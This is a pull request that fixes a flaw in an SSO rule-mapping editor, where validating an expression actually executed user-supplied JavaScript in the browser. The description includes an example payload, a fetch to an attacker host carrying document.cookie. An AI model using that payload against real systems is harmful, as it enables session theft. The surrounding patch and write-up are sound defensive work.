### PR TITLE
fix: stop executing user code in SSO expression validator

### DIFF
--- a/packages/frontend/editor-ui/src/features/settings/sso/provisioning/components/RuleMappingExpressionInput.vue
+++ b/packages/frontend/editor-ui/src/features/settings/sso/provisioning/components/RuleMappingExpressionInput.vue
@@ -51,21 +51,18 @@ const dialogVisible = ref(false);
 let editorView: EditorView | null = null;
 let expandedEditorView: EditorView | null = null;
 
-// Mock $claims: every property returns a real array so .includes() works but .includ() throws
-const mockClaims = new Proxy(
-	{},
-	{ get: (_target, prop) => (typeof prop === 'symbol' ? undefined : ['mock']) },
-);
-
 function validateExpression(value: string): boolean {
 	if (!value.trim()) return true;
 	const match = value.match(/^\{\{(.+)\}\}$/s);
 	const jsContent = match ? match[1].trim() : value.trim();
 	if (!jsContent) return true;
 	try {
+		// Syntax-only validation: the Function constructor throws SyntaxError for
+		// invalid JS without executing the body. Do NOT call the returned function —
+		// calling it would execute user-provided code in the browser context where
+		// window, document, and fetch are all reachable.
 		// eslint-disable-next-line no-new-func, @typescript-eslint/no-implied-eval
-		const fn = new Function('$claims', '$oidc', '$saml', '$provider', `return (${jsContent})`);
-		fn(mockClaims, { idToken: {}, userInfo: {} }, { attributes: {} }, 'oidc');
+		new Function('$claims', '$oidc', '$saml', '$provider', `return (${jsContent})`);
 		return true;
 	} catch {
 		return false;


### PR DESCRIPTION
## Summary

`validateExpression()` in `RuleMappingExpressionInput.vue` was validating SSO claim-mapping expressions by creating a function via `new Function()` and then **calling it** with mock arguments:

```ts
// Before — executes user code in the browser
const fn = new Function('$claims', '$oidc', '$saml', '$provider', `return (${jsContent})`);
fn(mockClaims, { idToken: {}, userInfo: {} }, { attributes: {} }, 'oidc');
```

Calling the function executes the user-provided `jsContent` in the browser context, where `window`, `document`, `fetch`, and the full browser API are reachable. An admin configuring SSO rules could craft an expression like `{{fetch('https://attacker.com?c='+document.cookie)}}` and it would execute silently during validation.

## Fix

The `Function` constructor already throws a `SyntaxError` for invalid JavaScript **at compile time, before execution**. Syntax validation never required calling the function. Remove the `fn()` call and the now-unused `mockClaims` Proxy:

```ts
// After — compile-only, never executes
new Function('$claims', '$oidc', '$saml', '$provider', `return (${jsContent})`);
return true;
```

Behaviour is identical for valid expressions (returns `true`) and invalid ones (constructor throws `SyntaxError`, caught, returns `false`). The only difference is that user code is no longer executed.

## Impact

- Affected path: SSO provisioning → Rule Mapping editor (admin-only)  
- An admin entering a malicious expression could execute arbitrary browser-context code during validation (fetch, DOM access, cookie theft)
- Fix is a 2-line removal with no behavioural change to valid/invalid expression detection

## Test plan

- [ ] Valid expression `{{$claims.email.includes('@company.com')}}` → returns valid ✓  
- [ ] Invalid expression `{{$claims.email.includ(}}` (syntax error) → returns invalid ✓  
- [ ] Expression `{{fetch('https://example.com')}}` → returns valid (syntactically correct) but **no network request fires** ✓